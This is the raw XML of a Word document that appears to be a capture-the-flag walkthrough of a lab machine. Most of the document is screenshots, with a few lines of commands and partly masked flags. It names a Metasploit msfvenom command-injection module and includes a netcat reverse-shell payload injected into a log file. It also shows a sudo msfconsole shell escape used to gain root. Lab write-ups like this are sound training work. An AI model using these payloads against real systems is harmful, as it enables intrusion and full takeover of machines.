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00" w:rsidRDefault="00CA723D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F3D8162" wp14:editId="13151CFD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12" w:rsidRDefault="008B0312"/>
    <w:p w:rsidR="003B359F" w:rsidRDefault="00246334">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00173F74" w:rsidRPr="00A1192B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.10.226:5000/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008B0312" w:rsidRDefault="008B0312">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F296304" wp14:editId="62862B69">
            <wp:extent cx="5943600" cy="3917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3D" w:rsidRDefault="008E7387">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="076B009A" wp14:editId="570CCFD8">
            <wp:extent cx="31337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87" w:rsidRDefault="008E7387"/>
    <w:p w:rsidR="00CD6D4F" w:rsidRDefault="00CD6D4F">
      <w:r w:rsidRPr="00CD6D4F">
        <w:t>exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7387" w:rsidRDefault="008E7387"/>
    <w:p w:rsidR="00CA723D" w:rsidRDefault="00E24435">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13AEDD1D" wp14:editId="5B132E40">
            <wp:extent cx="5943600" cy="3757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5" w:rsidRDefault="00E24435"/>
    <w:p w:rsidR="00E24435" w:rsidRDefault="003D73EF">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18477D5C" wp14:editId="1A0998FE">
            <wp:extent cx="5943600" cy="76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EF" w:rsidRDefault="003D73EF"/>
    <w:p w:rsidR="003D73EF" w:rsidRDefault="00B94EE2">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="562592EA" wp14:editId="5664F93A">
            <wp:extent cx="31623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E2" w:rsidRDefault="00B94EE2"/>
    <w:p w:rsidR="00B94EE2" w:rsidRDefault="00846325">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="193E59ED" wp14:editId="47224382">
            <wp:extent cx="473392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25" w:rsidRDefault="00846325"/>
    <w:p w:rsidR="00846325" w:rsidRDefault="00304033">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28C79468" wp14:editId="369744A2">
            <wp:extent cx="30480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33" w:rsidRDefault="00304033"/>
    <w:p w:rsidR="00091067" w:rsidRDefault="00091067">
      <w:r w:rsidRPr="00091067">
        <w:t xml:space="preserve">python3 -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00091067">
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00091067">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00091067">
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00091067">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00091067">
        <w:t>"/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4537D" w:rsidRDefault="00B4537D"/>
    <w:p w:rsidR="00304033" w:rsidRDefault="009A5663">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0679302E" wp14:editId="2FAA4EB9">
            <wp:extent cx="41148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63" w:rsidRDefault="009A5663"/>
    <w:p w:rsidR="009A5663" w:rsidRDefault="00751161">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3731B72A" wp14:editId="269F7C76">
            <wp:extent cx="31813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61" w:rsidRDefault="00337E8E">
      <w:r>
        <w:t xml:space="preserve">User.txt: </w:t>
      </w:r>
      <w:r w:rsidR="00B14304" w:rsidRPr="00B14304">
        <w:t>ebca83b5823f</w:t>
      </w:r>
      <w:r w:rsidR="00246334">
        <w:t>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00B14304" w:rsidRDefault="00F81D33">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2036DC01" wp14:editId="522E4426">
            <wp:extent cx="442912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3" w:rsidRDefault="00F33877">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD4E406" wp14:editId="6D717CD2">
            <wp:extent cx="5943600" cy="2018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77" w:rsidRDefault="00F33877"/>
    <w:p w:rsidR="00F33877" w:rsidRDefault="007C10C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AFC4855" wp14:editId="42A2C520">
            <wp:extent cx="3114675" cy="58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78" w:rsidRDefault="005F5178"/>
    <w:p w:rsidR="004A236A" w:rsidRDefault="005C78D7">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t xml:space="preserve"> "1 2 ;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t>rm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t>f;mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t>f;cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t>/f|/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t xml:space="preserve"> 2&gt;&amp;1|nc 10.10.16.46 1234 &gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C78D7">
        <w:t>/f #" &gt;&gt; hackers</w:t>
      </w:r>
      <w:r w:rsidR="000638DF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17881B26" wp14:editId="30B2553F">
            <wp:extent cx="59436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3A" w:rsidRDefault="00432E3A"/>
    <w:p w:rsidR="00432E3A" w:rsidRDefault="0019435D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AA7C661" wp14:editId="20FAD714">
            <wp:extent cx="5943600" cy="11741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5D" w:rsidRDefault="0019435D"/>
    <w:p w:rsidR="0019435D" w:rsidRDefault="008C7BE2">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4223855C" wp14:editId="15735B91">
            <wp:extent cx="5943600" cy="1170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E2" w:rsidRDefault="00BA7E5D">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA7E5D">
        <w:t>pwn@scriptkiddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA7E5D">
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA7E5D">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA7E5D">
        <w:t xml:space="preserve"> /opt/metasploit-framework-6.0.9/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA7E5D">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BA7E5D" w:rsidRDefault="00BA7E5D">
      <w:r w:rsidRPr="00BA7E5D">
        <w:t xml:space="preserve">msf6 &gt; /bin/bash </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA7E5D">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BA7E5D" w:rsidRDefault="00BA7E5D"/>
    <w:p w:rsidR="008C7BE2" w:rsidRDefault="00074AFC">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11349F7B" wp14:editId="50CD60D4">
            <wp:extent cx="5724525" cy="581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FC" w:rsidRDefault="00074AFC"/>
    <w:p w:rsidR="00074AFC" w:rsidRDefault="00FB5936">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="110E7F4F" wp14:editId="71003B9F">
            <wp:extent cx="4705350" cy="158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5F" w:rsidRDefault="00FB5936">
      <w:r>
        <w:t xml:space="preserve">Root.txt: </w:t>
      </w:r>
      <w:r w:rsidR="00EE3EC6" w:rsidRPr="00EE3EC6">
        <w:t>cf4c2c63a</w:t>
      </w:r>
      <w:r w:rsidR="00246334">
        <w:t>XXXXXXXXXXXXXXXXXXXXXXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E1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638DF"/>
    <w:rsid w:val="00074AFC"/>
    <w:rsid w:val="00091067"/>
    <w:rsid w:val="000E0579"/>
    <w:rsid w:val="00173F74"/>
    <w:rsid w:val="0019435D"/>
    <w:rsid w:val="00246334"/>
    <w:rsid w:val="002A2600"/>
    <w:rsid w:val="00304033"/>
    <w:rsid w:val="00337E8E"/>
    <w:rsid w:val="003B359F"/>
    <w:rsid w:val="003D73EF"/>
    <w:rsid w:val="00432E3A"/>
    <w:rsid w:val="00474C7F"/>
    <w:rsid w:val="004A236A"/>
    <w:rsid w:val="00544941"/>
    <w:rsid w:val="005C78D7"/>
    <w:rsid w:val="005F5178"/>
    <w:rsid w:val="0070092E"/>
    <w:rsid w:val="00751161"/>
    <w:rsid w:val="007C10C3"/>
    <w:rsid w:val="00846325"/>
    <w:rsid w:val="008B0312"/>
    <w:rsid w:val="008C7BE2"/>
    <w:rsid w:val="008E7387"/>
    <w:rsid w:val="009A5663"/>
    <w:rsid w:val="009E2929"/>
    <w:rsid w:val="009F43E3"/>
    <w:rsid w:val="00A35AB0"/>
    <w:rsid w:val="00B14304"/>
    <w:rsid w:val="00B4537D"/>
    <w:rsid w:val="00B94EE2"/>
    <w:rsid w:val="00BA7E5D"/>
    <w:rsid w:val="00CA723D"/>
    <w:rsid w:val="00CD6D4F"/>
    <w:rsid w:val="00CD7C11"/>
    <w:rsid w:val="00E13E5F"/>
    <w:rsid w:val="00E24435"/>
    <w:rsid w:val="00EE3EC6"/>
    <w:rsid w:val="00F33877"/>
    <w:rsid w:val="00F81D33"/>
    <w:rsid w:val="00FB5936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EC58"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{23E7085A-6C6C-4583-A299-7C47A430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10.10.10.226:5000/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attacker</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>saksham dixit</cp:lastModifiedBy>
  <cp:revision>101</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-12T15:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-14T16:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>